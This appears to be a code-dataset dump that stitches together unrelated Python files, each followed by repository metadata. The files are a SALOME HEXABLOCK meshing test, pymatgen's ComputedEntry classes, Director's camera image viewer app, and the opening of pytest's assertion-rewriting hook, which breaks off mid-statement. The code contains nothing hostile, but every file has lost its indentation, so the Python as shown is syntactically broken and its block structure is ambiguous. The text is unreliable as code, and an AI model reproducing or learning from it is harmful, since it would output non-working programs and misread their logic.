# See http://www.salome-platform.org/ or email : webmaster.salome@opencascade.com
#
# Hexa : Creation d'hexaedres
import hexablock
import os
#---+----1----+----2----+----3----+----4----+----5----+----6----+----7----+----8
doc = hexablock.addDocument ("default")
vx = doc.addVector (1,0,0)
vy = doc.addVector (0,1,0)
vz = doc.addVector (0,0,1)
vxy = doc.addVector (1,1,0)
nbr_files = 0
# ======================================================= save_vtk
def save_vtk () :
global nbr_files
nom = "monica%d.vtk" % nbr_files
nbr_files += 1
doc.saveVtk (nom)
# ======================================================= carre
def carre (x) :
return x*x
# ======================================================= get_center
def get_center (quad) :
px = 0
py = 0
pz = 0
for nv in range (4) :
vertex = quad.getVertex (nv)
px += vertex.getX() / 4
py += vertex.getY() / 4
pz += vertex.getZ() / 4
return [ px, py, pz ]
# ======================================================= nearest
def nearest (grid, vertex) :
nbre = grid.countVertex()
dmin = 1e+6
result = None
px = vertex.getX()
py = vertex.getY()
pz = vertex.getZ()
for nro in range (nbre) :
v1 = grid.getVertex (nro)
d2 = carre(px-v1.getX()) + carre(py-v1.getY()) + carre(pz-v1.getZ())
if (d2 < dmin) :
result = v1
dmin = d2
print vertex.getName () , px, py, pz, " -> ", result.getName()
return result
# ======================================================= nearest_quad
def nearest_quad (grid, quad) :
dmin = 1e+16
result = None
[ox, oy, oz] = get_center (quad)
nbre = grid.countQuad ()
for nro in range (nbre) :
q1 = grid.getQuad (nro)
if q1 != None :
[px, py, pz] = get_center (q1)
d2 = carre(px-ox) + carre(py-oy) + carre(pz-oz)
if (d2 < dmin) :
result = q1
dmin = d2
print quad.getName () , px, py, pz, " -> ", result.getName()
return result
# ======================================================= insert_cylinder
def insert_cylinder (plaque, nx, ny) :
hexa = plaque.getHexaIJK (nx, ny, 0)
xmin = 666 ; ymin = xmin ; zmin = xmin
xmax = -666 ; ymax = xmax ; zmax = xmax
tabv1 = []
for nv in range (8) :
node = hexa.getVertex (nv)
xmin = min (xmin, node.getX()) ; xmax = max (xmax, node.getX())
ymin = min (ymin, node.getY()) ; ymax = max (ymax, node.getY())
zmin = min (zmin, node.getZ()) ; zmax = max (zmax, node.getZ())
tabv1.append (node)
doc.removeHexa (hexa)
save_vtk ()
dx = (xmax - xmin)/2
dz = (zmax - zmin)/2
xorig = (xmin + xmax)/2
yorig = (ymin + ymax)/2
zorig = (zmin + zmax)/2 - 3*dz
orig = doc.addVertex (xorig, yorig, zorig)
nr = 1
na = 4
nh = 3
rext = dx
rint = rext/3
haut = 3
angle = 360
pipe = doc.makePipeUni (orig, vxy,vz, rint,rext,angle,haut, nr,na,nh)
hexablock.what ()
tabquad = []
tabv0 = []
for nq in range (4) :
quad = pipe.getQuadJK (1, nq, 1)
tabquad.append (quad)
print " .. tabquad[0] = ", tabquad[0].getName ()
cible = nearest_quad (plaque, tabquad[0])
tabquad[0]. setColor (5)
cible . setColor (5)
save_vtk ()
va1 = tabquad[0].getVertex (0)
va2 = tabquad[0].getVertex (1)
vb1 = cible.nearestVertex (va1)
vb2 = cible.nearestVertex (va2)
doc.setLevel (1)
doc.joinQuadsUni (tabquad, cible, va1, vb1, va2, vb2, 1)
hexablock.what ()
save_vtk ()
return
doc.setLevel (1)
for nv in range (8) :
ier = doc.mergeVertices (tabv0[nv], tabv1[nv])
print "ier = ", ier
save_vtk ()
# ======================================================= test_monica
def test_monica () :
orig = doc.addVertex (0,0,0)
lx = 1
ly = lx
lz = lx
nx = 3
ny = nx
nz = 1
plaque = doc.makeCartesianUni (orig, vx,vy,vz, lx, ly, lz, nx,ny,nz)
save_vtk ()
insert_cylinder (plaque, 1, 1)
## hexa = plaque.getHexaIJK (1,1,0)
## doc.removeHexa (hexa)
return doc
# ================================================================= Begin
doc = test_monica ()
law = doc.addLaw("Uniform", 4)
for j in range(doc.countPropagation()):
propa = doc.getPropagation(j)
propa.setLaw(law)
mesh_hexas = hexablock.mesh (doc)
|
FedoraScientific/salome-hexablock
|
src/TEST_PY/test_v6/monica.py
|
Python
|
lgpl-2.1
| 5,353
|
[
"VTK"
] |
f1b048d6f8f6a90ee8b123115e8a85d39a2d190cfde9685c1c91372d1537a0bd
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This module implements equivalents of the basic ComputedEntry objects, which
is the basic entity that can be used to perform many analyses. ComputedEntries
contain calculated information, typically from VASP or other electronic
structure codes. For example, ComputedEntries can be used as inputs for phase
diagram analysis.
"""
import json
from monty.json import MontyEncoder, MontyDecoder
from pymatgen.core.composition import Composition
from pymatgen.core.structure import Structure
from pymatgen.entries import Entry
__author__ = "Shyue Ping Ong, Anubhav Jain"
__copyright__ = "Copyright 2011, The Materials Project"
__version__ = "1.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
__status__ = "Production"
__date__ = "Apr 30, 2012"
class ComputedEntry(Entry):
"""
Lightweight Entry object for computed data. Contains facilities
for applying corrections to the .energy attribute and for storing
calculation parameters.
"""
def __init__(self,
composition: Composition,
energy: float,
correction: float = 0.0,
parameters: dict = None,
data: dict = None,
entry_id: object = None):
"""
Initializes a ComputedEntry.
Args:
composition (Composition): Composition of the entry. For
flexibility, this can take the form of all the typical input
taken by a Composition, including a {symbol: amt} dict,
a string formula, and others.
energy (float): Energy of the entry. Usually the final calculated
energy from VASP or other electronic structure codes.
correction (float): A correction to be applied to the energy.
This is used to modify the energy for certain analyses.
Defaults to 0.0.
parameters (dict): An optional dict of parameters associated with
the entry. Defaults to None.
data (dict): An optional dict of any additional data associated
with the entry. Defaults to None.
entry_id (obj): An optional id to uniquely identify the entry.
"""
super().__init__(composition, energy)
self.uncorrected_energy = self._energy
self.correction = correction
self.parameters = parameters if parameters else {}
self.data = data if data else {}
self.entry_id = entry_id
self.name = self.composition.reduced_formula
@property
def energy(self) -> float:
"""
:return: the *corrected* energy of the entry.
"""
return self._energy + self.correction
def normalize(self, mode: str = "formula_unit") -> None:
"""
Normalize the entry's composition and energy.
Args:
mode: "formula_unit" is the default, which normalizes to
composition.reduced_formula. The other option is "atom", which
normalizes such that the composition amounts sum to 1.
"""
factor = self._normalization_factor(mode)
self.correction /= factor
self.uncorrected_energy /= factor
super().normalize(mode)
def __repr__(self):
output = ["ComputedEntry {} - {}".format(self.entry_id,
self.composition.formula),
"Energy = {:.4f}".format(self._energy),
"Correction = {:.4f}".format(self.correction),
"Parameters:"]
for k, v in self.parameters.items():
output.append("{} = {}".format(k, v))
output.append("Data:")
for k, v in self.data.items():
output.append("{} = {}".format(k, v))
return "\n".join(output)
@classmethod
def from_dict(cls, d) -> 'ComputedEntry':
"""
:param d: Dict representation.
:return: ComputedEntry
"""
dec = MontyDecoder()
return cls(d["composition"], d["energy"], d["correction"],
parameters={k: dec.process_decoded(v)
for k, v in d.get("parameters", {}).items()},
data={k: dec.process_decoded(v)
for k, v in d.get("data", {}).items()},
entry_id=d.get("entry_id", None))
def as_dict(self) -> dict:
"""
:return: MSONable dict.
"""
return_dict = super().as_dict()
return_dict.update({"parameters": json.loads(json.dumps(self.parameters, cls=MontyEncoder)),
"data": json.loads(json.dumps(self.data, cls=MontyEncoder)),
"entry_id": self.entry_id,
"correction": self.correction})
return return_dict
class ComputedStructureEntry(ComputedEntry):
"""
A heavier version of ComputedEntry which contains a structure as well. The
structure is needed for some analyses.
"""
def __init__(self,
structure: Structure,
energy: float,
correction: float = 0.0,
parameters: dict = None,
data: dict = None,
entry_id: object = None):
"""
Initializes a ComputedStructureEntry.
Args:
structure (Structure): The actual structure of an entry.
energy (float): Energy of the entry. Usually the final calculated
energy from VASP or other electronic structure codes.
correction (float): A correction to be applied to the energy.
This is used to modify the energy for certain analyses.
Defaults to 0.0.
parameters (dict): An optional dict of parameters associated with
the entry. Defaults to None.
data (dict): An optional dict of any additional data associated
with the entry. Defaults to None.
entry_id (obj): An optional id to uniquely identify the entry.
"""
super().__init__(
structure.composition, energy, correction=correction,
parameters=parameters, data=data, entry_id=entry_id)
self.structure = structure
def __repr__(self):
output = ["ComputedStructureEntry {} - {}".format(
self.entry_id, self.composition.formula),
"Energy = {:.4f}".format(self.uncorrected_energy),
"Correction = {:.4f}".format(self.correction), "Parameters:"]
for k, v in self.parameters.items():
output.append("{} = {}".format(k, v))
output.append("Data:")
for k, v in self.data.items():
output.append("{} = {}".format(k, v))
return "\n".join(output)
def __str__(self):
return self.__repr__()
def as_dict(self) -> dict:
"""
:return: MSONAble dict.
"""
d = super().as_dict()
d["@module"] = self.__class__.__module__
d["@class"] = self.__class__.__name__
d["structure"] = self.structure.as_dict()
return d
@classmethod
def from_dict(cls, d) -> 'ComputedStructureEntry':
"""
:param d: Dict representation.
:return: ComputedStructureEntry
"""
dec = MontyDecoder()
return cls(dec.process_decoded(d["structure"]),
d["energy"], d["correction"],
parameters={k: dec.process_decoded(v)
for k, v in d.get("parameters", {}).items()},
data={k: dec.process_decoded(v)
for k, v in d.get("data", {}).items()},
entry_id=d.get("entry_id", None))
|
gVallverdu/pymatgen
|
pymatgen/entries/computed_entries.py
|
Python
|
mit
| 7,871
|
[
"VASP",
"pymatgen"
] |
ab21271fc18637a6132c6ff836be4bb4b4d45bcc9c43ec1a86ff4e8cd026955a
|
import argparse
from director import consoleapp
from director import cameraview
from director import applogic
from director import viewbehaviors
from director import objectmodel as om
from director import vtkAll as vtk
import PythonQt
from PythonQt import QtGui
import bot_core as lcmbotcore
class ImageViewApp(object):
def __init__(self):
self.setup()
def addShortcuts(self, widget):
applogic.addShortcut(widget, 'Ctrl+Q', consoleapp.ConsoleApp.quit)
applogic.addShortcut(widget, 'F8', consoleapp.ConsoleApp.showPythonConsole)
def parseArgs(self, defaultChannel='MULTISENSE_CAMERA_LEFT'):
parser = argparse.ArgumentParser()
parser.add_argument('--channel', type=str, help='image channel', default=defaultChannel)
parser.add_argument('--pointcloud', action='store_true', help='display pointcloud view for RGB-D messages')
parser.add_argument('--disparity', action='store_true', help='receive disparity images for --rgbd flag')
imageType = parser.add_mutually_exclusive_group(required=False)
imageType.add_argument('--rgb', action='store_const', const='rgb', help='receive RGB image messages', dest='imageType')
imageType.add_argument('--rgbd', action='store_const', const='rgbd', help='receive RGB-D images messages', dest='imageType')
imageType.set_defaults(imageType='rgb')
args, unknown = parser.parse_known_args()
return args
def setup(self):
args = self.parseArgs()
imageManager = cameraview.ImageManager()
self.imageManager = imageManager
channel = args.channel
imageType = args.imageType
self.app = consoleapp.ConsoleApp()
self.views = []
if imageType == 'rgb':
imageName = channel
imageManager.queue.addCameraStream(channel, imageName, -1)
imageManager.addImage(imageName)
cameraView = cameraview.CameraImageView(imageManager, imageName, view=PythonQt.dd.ddQVTKWidgetView())
cameraView.eventFilterEnabled = False
cameraView.view.renderWindow().GetInteractor().SetInteractorStyle(vtk.vtkInteractorStyleImage())
cameraView.view.resize(640, 480)
self.views.append(cameraView.view)
self.cameraView = cameraView
elif imageType == 'rgbd':
imageName = channel + '_LEFT'
imageManager.queue.addCameraStream(channel, imageName, 0)
imageManager.addImage(imageName)
cameraView = cameraview.CameraImageView(imageManager, imageName, view=PythonQt.dd.ddQVTKWidgetView())
cameraView.eventFilterEnabled = False
cameraView.view.renderWindow().GetInteractor().SetInteractorStyle(vtk.vtkInteractorStyleImage())
self.views.append(cameraView.view)
imageName2 = channel + '_D'
if args.disparity:
imageManager.queue.addCameraStream(channel, imageName2, lcmbotcore.images_t.DISPARITY_ZIPPED)
else:
imageManager.queue.addCameraStream(channel, imageName2, lcmbotcore.images_t.DEPTH_MM_ZIPPED)
imageManager.addImage(imageName2)
cameraView2 = cameraview.CameraImageView(imageManager, imageName2, view=PythonQt.dd.ddQVTKWidgetView())
cameraView2.eventFilterEnabled = False
cameraView2.useImageColorMap = True
cameraView2.view.renderWindow().GetInteractor().SetInteractorStyle(vtk.vtkInteractorStyleImage())
self.views.append(cameraView2.view)
if args.pointcloud:
from director import segmentation
cameraview.imageManager = imageManager
pointCloudObj = segmentation.DisparityPointCloudItem('Point cloud', channel, imageName, imageManager)
view = PythonQt.dd.ddQVTKWidgetView()
pointCloudObj.addToView(view)
om.addToObjectModel(pointCloudObj)
pointCloudObj.setProperty('Visible', True)
pointCloudObj.setProperty('Target FPS', 30)
pointCloudObj.setProperty('Max Range', 30)
pointCloudObj.setProperty('Remove Size', 0)
viewBehaviors = viewbehaviors.ViewBehaviors(view)
view.camera().SetPosition([0, 0, 0])
view.camera().SetFocalPoint([0,0,1])
view.camera().SetViewUp([0,-1,0])
view.camera().SetViewAngle(45)
self.views.append(view)
self.cameraView = cameraView
self.cameraView2 = cameraView2
w = QtGui.QWidget()
l = QtGui.QHBoxLayout(w)
for view in self.views:
l.addWidget(view)
l.setContentsMargins(0, 0, 0, 0)
w.resize(640*len(self.views), 480)
w.show()
self.addShortcuts(w)
self.widget = w
def start(self):
self.app.start()
def main():
ImageViewApp().start()
if __name__ == '__main__':
main()
|
patmarion/director
|
src/python/director/imageviewapp.py
|
Python
|
bsd-3-clause
| 5,008
|
[
"VTK"
] |
5ee7ea5466ac95754758477e19a5f6b441970c5b7267e06585a4aff6b1a0e734
|
"""Rewrite assertion AST to produce nice error messages"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ast
import errno
import imp
import itertools
import marshal
import os
import re
import string
import struct
import sys
import types
import atomicwrites
import py
import six
from _pytest._io.saferepr import saferepr
from _pytest.assertion import util
from _pytest.assertion.util import ( # noqa: F401
format_explanation as _format_explanation,
)
from _pytest.compat import spec_from_file_location
from _pytest.pathlib import fnmatch_ex
from _pytest.pathlib import PurePath
# pytest caches rewritten pycs in __pycache__.
if hasattr(imp, "get_tag"):
PYTEST_TAG = imp.get_tag() + "-PYTEST"
else:
if hasattr(sys, "pypy_version_info"):
impl = "pypy"
elif sys.platform == "java":
impl = "jython"
else:
impl = "cpython"
ver = sys.version_info
PYTEST_TAG = "%s-%s%s-PYTEST" % (impl, ver[0], ver[1])
del ver, impl
PYC_EXT = ".py" + (__debug__ and "c" or "o")
PYC_TAIL = "." + PYTEST_TAG + PYC_EXT
ASCII_IS_DEFAULT_ENCODING = sys.version_info[0] < 3
if sys.version_info >= (3, 5):
ast_Call = ast.Call
else:
def ast_Call(a, b, c):
return ast.Call(a, b, c, None, None)
class AssertionRewritingHook(object):
"""PEP302 Import hook which rewrites asserts."""
def __init__(self, config):
self.config = config
self.fnpats = config.getini("python_files")
self.session = None
self.modules = {}
self._rewritten_names = set()
self._register_with_pkg_resources()
self._must_rewrite = set()
# flag to guard against trying to rewrite a pyc file while we are already writing another pyc file,
# which might result in infinite recursion (#3506)
self._writing_pyc = False
self._basenames_to_check_rewrite = {"conftest"}
self._marked_for_rewrite_cache = {}
self._session_paths_checked = False
def set_session(self, session):
self.session = session
self._session_paths_checked = False
def _imp_find_module(self, name, path=None):
"""Indirection so we can mock calls to find_module originated from the hook during testing"""
return imp.find_module(name, path)
def find_module(self, name, path=None):
if self._writing_pyc:
return None
state = self.config._assertstate
if self._early_rewrite_bailout(name, state):
return None
state.trace("find_module called for: %s" % name)
names = name.rsplit(".", 1)
lastname = names[-1]
pth = None
if path is not None:
# Starting with Python 3.3, path is a _NamespacePath(), which
# causes problems if not converted to list.
path = list(path)
if len(path) == 1:
pth = path[0]
if pth is None:
try:
fd, fn, desc = self._imp_find_module(lastname, path)
except ImportError:
return None
if fd is not None:
fd.close()
tp = desc[2]
if tp == imp.PY_COMPILED:
if hasattr(imp, "source_from_cache"):
try:
fn = imp.source_from_cache(fn)
except ValueError:
# Python 3 doesn't like orphaned but still-importable
# .pyc files.
fn = fn[:-1]
else:
fn = fn[:-1]
elif tp != imp.PY_SOURCE:
# Don't know what this is.
return None
else:
fn = os.path.join(pth, name.rpartition(".")[2] + ".py")
fn_pypath = py.path.local(fn)
if not self._should_rewrite(name, fn_pypath, state):
return None
self._rewritten_names.add(name)
# The requested module looks like a test file, so rewrite it. This is
# the most magical part of the process: load the source, rewrite the
# asserts, and load the rewritten source. We also cache the rewritten
# module code in a special pyc. We must be aware of the possibility of
# concurrent pytest processes rewriting and loading pycs. To avoid
# tricky race conditions, we maintain the following invariant: The
# cached pyc is always a complete, valid pyc. Operations on it must be
# atomic. POSIX's atomic rename comes in handy.
write = not sys.dont_write_bytecode
cache_dir = os.path.join(fn_pypath.dirname, "__pycache__")
if write:
try:
os.mkdir(cache_dir)
except OSError:
e = sys.exc_info()[1].errno
if e == errno.EEXIST:
# Either the __pycache__ directory already exists (the
# common case) or it's blocked by a non-dir node. In the
# latter case, we'll ignore it in _write_pyc.
pass
elif e in [errno.ENOENT, errno.ENOTDIR]:
# One of the path components was not a directory, likely
# because we're in a zip file.
write = False
elif e in [errno.EACCES, errno.EROFS, errno.EPERM]:
state.trace("read only directory: %r" % fn_pypath.dirname)
write = False
else:
raise
cache_name = fn_pypath.basename[:-3] + PYC_TAIL
pyc = os.path.join(cache_dir, cache_name)
# Notice that even if we're in a read-only directory, I'm going
# to check for a cached pyc. This may not be optimal...
co = _read_pyc(fn_pypath, pyc, state.trace)
if co is None:
state.trace("rewriting %r" % (fn,))
source_stat, co = _rewrite_test(self.config, fn_pypath)
if co is None:
# Probably a SyntaxError in the test.
return None
if write:
self._writing_pyc = True
try:
_write_pyc(state, co, source_stat, pyc)
finally:
self._writing_pyc = False
else:
state.trace("found cached rewritten pyc for %r" % (fn,))
self.modules[name] = co, pyc
return self
def _early_rewrite_bailout(self, name, state):
"""
This is a fast way to get out of rewriting modules. Profiling has
shown that the call to imp.find_module (inside of the find_module
from this class) is a major slowdown, so, this method tries to
filter what we're sure won't be rewritten before getting to it.
"""
if self.session is not None and not self._session_paths_checked:
self._session_paths_checked = True
for path in self.session._initialpaths:
# Make something as c:/projects/my_project/path.py ->
# ['c:', 'projects', 'my_project', 'path.py']
parts = str(path).split(os.path.sep)
# add 'path' to basenames to be checked.
self._basenames_to_check_rewrite.add(os.path.splitext(parts[-1])[0])
# Note: conftest already by default in _basenames_to_check_rewrite.
parts = name.split(".")
if parts[-1] in self._basenames_to_check_rewrite:
return False
# For matching the name it must be as if it was a filename.
path = PurePath(os.path.sep.join(parts) + ".py")
for pat in self.fnpats:
# if the pattern contains subdirectories ("tests/**.py" for example) we can't bail out based
# on the name alone because we need to match against the full path
if os.path.dirname(pat):
return False
if fnmatch_ex(pat, path):
return False
if self._is_marked_for_rewrite(name, state):
return False
state.trace("early skip of rewriting module: %s" % (name,))
return True
def _should_rewrite(self, name, fn_pypath, state):
# always rewrite conftest files
fn = str(fn_pypath)
if fn_pypath.basename == "conftest.py":
state.trace("rewriting conftest file: %r" % (fn,))
return True
if self.session is not None:
if self.session.isinitpath(fn):
state.trace("matched test file (was specified on cmdline): %r" % (fn,))
return True
# modules not passed explicitly on the command line are only
# rewritten if they match the naming convention for test files
for pat in self.fnpats:
if fn_pypath.fnmatch(pat):
state.trace("matched test file %r" % (fn,))
return True
return self._is_marked_for_rewrite(name, state)
def _is_marked_for_rewrite(self, name, state):
try:
return self._marked_for_rewrite_cache[name]
except KeyError:
for marked in self._must_rewrite:
if name == marked or name.startswith(marked + "."):
state.trace("matched marked file %r (from %r)" % (name, marked))
self._marked_for_rewrite_cache[name] = True
return True
self._marked_for_rewrite_cache[name] = False
return False
def mark_rewrite(self, *names):
"""Mark import names as needing to be rewritten.
The named module or package as well as any nested modules will
be rewritten on import.
"""
already_imported = (
set(names).intersection(sys.modules).difference(self._rewritten_names)
)
for name in already_imported:
if not AssertionRewriter.is_rewrite_disabled(
sys.modules[name].__doc__ or ""
):
self._warn_already_imported(name)
self._must_rewrite.update(names)
self._marked_for_rewrite_cache.clear()
def _warn_already_imported(self, name):
from _pytest.warning_types import PytestWarning
from _pytest.warnings import _issue_warning_captured
_issue_warning_captured(
PytestWarning("Module already imported so cannot be rewritten: %s" % name),
self.config.hook,
stacklevel=5,
)
def load_module(self, name):
co, pyc = self.modules.pop(name)
if name in sys.modules:
# If there is an existing module object named 'fullname' in
# sys.modules, the loader must use that existing module. (Otherwise,
# the reload() builtin will not work correctly.)
mod = sys.modules[name]
else:
# I wish I could just call imp.load_compiled here, but __file__ has to
# be set properly. In Python 3.2+, this all would be handled correctly
# by load_compiled.
mod = sys.modules[name] = imp.new_module(name)
try:
mod.__file__ = co.co_filename
# Normally, this attribute is 3.2+.
mod.__cached__ = pyc
mod.__loader__ = self
# Normally, this attribute is 3.4+
mod.__spec__ = spec_from_file_location(name, co.co_filename, loader=self)
six.exec_(co, mod.__dict__)
except: # noqa
if name in sys.modules:
del sys.modules[name]
raise
return sys.modules[name]
def is_package(self, name):
try:
fd, fn, desc = self._imp_find_module(name)
except ImportError:
return False
if fd is not None:
fd.close()
tp = desc[2]
return tp == imp.PKG_DIRECTORY
@classmethod
def _register_with_pkg_resources(cls):
"""
Ensure package resources can be loaded from this loader. May be called
multiple times, as the operation is idempotent.
"""
try:
import pkg_resources
# access an attribute in case a deferred importer is present
pkg_resources.__name__
except ImportError:
return
# Since pytest tests are always located in the file system, the
# DefaultProvider is appropriate.
pkg_resources.register_loader_type(cls, pkg_resources.DefaultProvider)
def get_data(self, pathname):
"""Optional PEP302 get_data API.
"""
with open(pathname, "rb") as f:
return f.read()
def _write_pyc(state, co, source_stat, pyc):
# Technically, we don't have to have the same pyc format as
# (C)Python, since these "pycs" should never be seen by builtin
# import. However, there's little reason deviate, and I hope
# sometime to be able to use imp.load_compiled to load them. (See
# the comment in load_module above.)
try:
with atomicwrites.atomic_write(pyc, mode="wb", overwrite=True) as fp:
fp.write(imp.get_magic())
# as of now, bytecode header expects 32-bit numbers for size and mtime (#4903)
mtime = int(source_stat.mtime) & 0xFFFFFFFF
size = source_stat.size & 0xFFFFFFFF
# "<LL" stands for 2 unsigned longs, little-ending
fp.write(struct.pack("<LL", mtime, size))
fp.write(marshal.dumps(co))
except EnvironmentError as e:
state.trace("error writing pyc file at %s: errno=%s" % (pyc, e.errno))
# we ignore any failure to write the cache file
# there are many reasons, permission-denied, __pycache__ being a
# file etc.
return False
return True
RN = "\r\n".encode("utf-8")
N = "\n".encode("utf-8")
cookie_re = re.compile(r"^[ \t\f]*#.*coding[:=][ \t]*[-\w.]+")
BOM_UTF8 = "\xef\xbb\xbf"
def _rewrite_test(config, fn):
"""Try to read and rewrite *fn* and return the code object."""
state = config._assertstate
try:
stat = fn.stat()
source = fn.read("rb")
except EnvironmentError:
return None, None
if ASCII_IS_DEFAULT_ENCODING:
# ASCII is the default encoding in Python 2. Without a coding
# declaration, Python 2 will complain about any bytes in the file
# outside the ASCII range. Sadly, this behavior does not extend to
# compile() or ast.parse(), which prefer to interpret the bytes as
# latin-1. (At least they properly handle explicit coding cookies.) To
# preserve this error behavior, we could force ast.parse() to use ASCII
# as the encoding by inserting a coding cookie. Unfortunately, that
# messes up line numbers. Thus, we have to check ourselves if anything
# is outside the ASCII range in the case no encoding is explicitly
# declared. For more context, see issue #269. Yay for Python 3 which
# gets this right.
end1 = source.find("\n")
end2 = source.find("\n", end1 + 1)
if (
not source.startswith(BOM_UTF8)
and cookie_re.match(source[0:end1]) is None
and cookie_re.match(source[end1 + 1 : end2]) is None
):
if hasattr(state, "_indecode"):
# encodings imported us again, so don't rewrite.
return None, None
state._indecode = True
try:
try:
source.decode("ascii")
except UnicodeDecodeError:
# Let it fail in real import.
return None, None
finally:
del state._indecode
try:
tree = ast.parse(source, filename=fn.strpath)
except SyntaxError:
# Let this pop up again in the real import.
state.trace("failed to parse: %r" % (fn,))
return None, None
rewrite_asserts(tree, fn, config)
try:
co = compile(tree, fn.strpath, "exec", dont_inherit=True)
except SyntaxError:
# It's possible that this error is from some bug in the
# assertion rewriting, but I don't know of a fast way to tell.
state.trace("failed to compile: %r" % (fn,))
return None, None
return stat, co
def _read_pyc(source, pyc, trace=lambda x: None):
"""Possibly read a pytest pyc containing rewritten code.
Return rewritten code if successful or None if not.
"""
try:
fp = open(pyc, "rb")
except IOError:
return None
with fp:
try:
mtime = int(source.mtime())
size = source.size()
data = fp.read(12)
except EnvironmentError as e:
trace("_read_pyc(%s): EnvironmentError %s" % (source, e))
return None
# Check for invalid or out of date pyc file.
if (
len(data) != 12
or data[:4] != imp.get_magic()
or struct.unpack("<LL", data[4:]) != (mtime & 0xFFFFFFFF, size & 0xFFFFFFFF)
):
trace("_read_pyc(%s): invalid or out of date pyc" % source)
return None
try:
co = marshal.load(fp)
except Exception as e:
trace("_read_pyc(%s): marshal.load error %s" % (source, e))
return None
if not isinstance(co, types.CodeType):
trace("_read_pyc(%s): not a code object" % source)
return None
return co
def rewrite_asserts(mod, module_path=None, config=None):
"""Rewrite the assert statements in mod."""
AssertionRewriter(module_path, config).run(mod)
def _saferepr(obj):
"""Get a safe repr of an object for assertion error messages.
The assertion formatting (util.format_explanation()) requires
newlines to be escaped since they are a special character for it.
Normally assertion.util.format_explanation() does this but for a
custom repr it is possible to contain one of the special escape
sequences, especially '\n{' and '\n}' are likely to be present in
JSON reprs.
"""
r = saferepr(obj)
# only occurs in python2.x, repr must return text in python3+
if isinstance(r, bytes):
# Represent unprintable bytes as `\x##`
r = u"".join(
u"\\x{:x}".format(ord(c)) if c not in string.printable else c.decode()
for c in r
)
return r.replace(u"\n", u"\\n")
def _format_assertmsg(obj):
"""Format the custom assertion message given.
For strings this simply replaces newlines with '\n~' so that
util.format_explanation() will preserve them instead of escaping
newlines. For other objects saferepr() is used first.
"""
# reprlib appears to have a bug which means that if a string
# contains a newline it gets escaped, however if an object has a
# .__repr__() which contains newlines it does not get escaped.
# However in either case we want to preserve the newline.
replaces = [(u"\n", u"\n~"), (u"%", u"%%")]
if not isinstance(obj, six.string_types):
obj = saferepr(obj)
replaces.append((u"\\n", u"\n~"))
if isinstance(obj, bytes):
replaces = [(r1.encode(), r2.encode()) for r1, r2 in replaces]
for r1, r2 in replaces:
obj = obj.replace(r1, r2)
return obj
def _should_repr_global_name(obj):
if callable(obj):
return False
try:
return not hasattr(obj, "__name__")
except Exception:
return True
def _format_boolop(explanations, is_or):
explanation = "(" + (is_or and " or " or " and ").join(explanations) + ")"
if isinstance(explanation, six.text_type):
return explanation.replace(u"%", u"%%")
else:
return explanation.replace(b"%", b"%%")
def _call_reprcompare(ops, results, expls, each_obj):
for i, res, expl in zip(range(len(ops)), results, expls):
try:
done = not res
except Exception:
done = True
if done:
break
if util._reprcompare is not None:
custom = util._reprcompare(ops[i], each_obj[i], each_obj[i + 1])
if custom is not None:
return custom
return expl
unary_map = {ast.Not: "not %s", ast.Invert: "~%s", ast.USub: "-%s", ast.UAdd: "+%s"}
binop_map = {
ast.BitOr: "|",
ast.BitXor: "^",
ast.BitAnd: "&",
ast.LShift: "<<",
ast.RShift: ">>",
ast.Add: "+",
ast.Sub: "-",
ast.Mult: "*",
ast.Div: "/",
ast.FloorDiv: "//",
ast.Mod: "%%", # escaped for string formatting
ast.Eq: "==",
ast.NotEq: "!=",
ast.Lt: "<",
ast.LtE: "<=",
ast.Gt: ">",
ast.GtE: ">=",
ast.Pow: "**",
ast.Is: "is",
ast.IsNot: "is not",
ast.In: "in",
ast.NotIn: "not in",
}
# Python 3.5+ compatibility
try:
binop_map[ast.MatMult] = "@"
except AttributeError:
pass
# Python 3.4+ compatibility
if hasattr(ast, "NameConstant"):
_NameConstant = ast.NameConstant
else:
def _NameConstant(c):
return ast.Name(str(c), ast.Load())
def set_location(node, lineno, col_offset):
"""Set node location information recursively."""
def _fix(node, lineno, col_offset):
if "lineno" in node._attributes:
node.lineno = lineno
if "col_offset" in node._attributes:
node.col_offset = col_offset
for child in ast.iter_child_nodes(node):
_fix(child, lineno, col_offset)
_fix(node, lineno, col_offset)
return node
class AssertionRewriter(ast.NodeVisitor):
"""Assertion rewriting implementation.
The main entrypoint is to call .run() with an ast.Module instance,
this will then find all the assert statements and rewrite them to
provide intermediate values and a detailed assertion error. See
http://pybites.blogspot.be/2011/07/behind-scenes-of-pytests-new-assertion.html
for an overview of how this works.
The entry point here is .run() which will iterate over all the
statements in an ast.Module and for each ast.Assert statement it
finds call .visit() with it. Then .visit_Assert() takes over and
is responsible for creating new ast statements to replace the
original assert statement: it rewrites the test of an assertion
to provide intermediate values and replace it with an if statement
which raises an assertion error with a detailed explanation in
case the expression is false.
For this .visit_Assert() uses the visitor pattern to visit all the
AST nodes of the ast.Assert.test field, each visit call returning
an AST node and the corresponding explanation string. During this
state is kept in several instance attributes:
:statements: All the AST statements which will replace the assert
statement.
:variables: This is populated by .variable() with each variable
used by the statements so that they can all be set to None at
the end of the statements.
:variable_counter: Counter to create new unique variables needed
by statements. Variables are created using .variable() and
have the form of "@py_assert0".
:on_failure: The AST statements which will be executed if the
assertion test fails. This is the code which will construct
the failure message and raises the AssertionError.
:explanation_specifiers: A dict filled by .explanation_param()
with %-formatting placeholders and their corresponding
expressions to use in the building of an assertion message.
This is used by .pop_format_context() to build a message.
:stack: A stack of the explanation_specifiers dicts maintained by
.push_format_context() and .pop_format_context() which allows
to build another %-formatted string while already building one.
This state is reset on every new assert statement visited and used
by the other visitors.
"""
def __init__(self, module_path, config):
super(AssertionRewriter, self).__init__()
self.module_path = module_path
self.config = config
def run(self, mod):
"""Find all assert statements in *mod* and rewrite them."""
if not mod.body:
# Nothing to do.
return
# Insert some special imports at the top of the module but after any
# docstrings and __future__ imports.
aliases = [
ast.alias(six.moves.builtins.__name__, "@py_builtins"),
ast.alias("_pytest.assertion.rewrite", "@pytest_ar"),
]
doc = getattr(mod, "docstring", None)
expect_docstring = doc is None
if doc is not None and self.is_rewrite_disabled(doc):
return
pos = 0
lineno = 1
for item in mod.body:
if (
expect_docstring
and isinstance(item, ast.Expr)
and isinstance(item.value, ast.Str)
):
doc = item.value.s
if self.is_rewrite_disabled(doc):
return
expect_docstring = False
elif (
not isinstance(item, ast.ImportFrom)
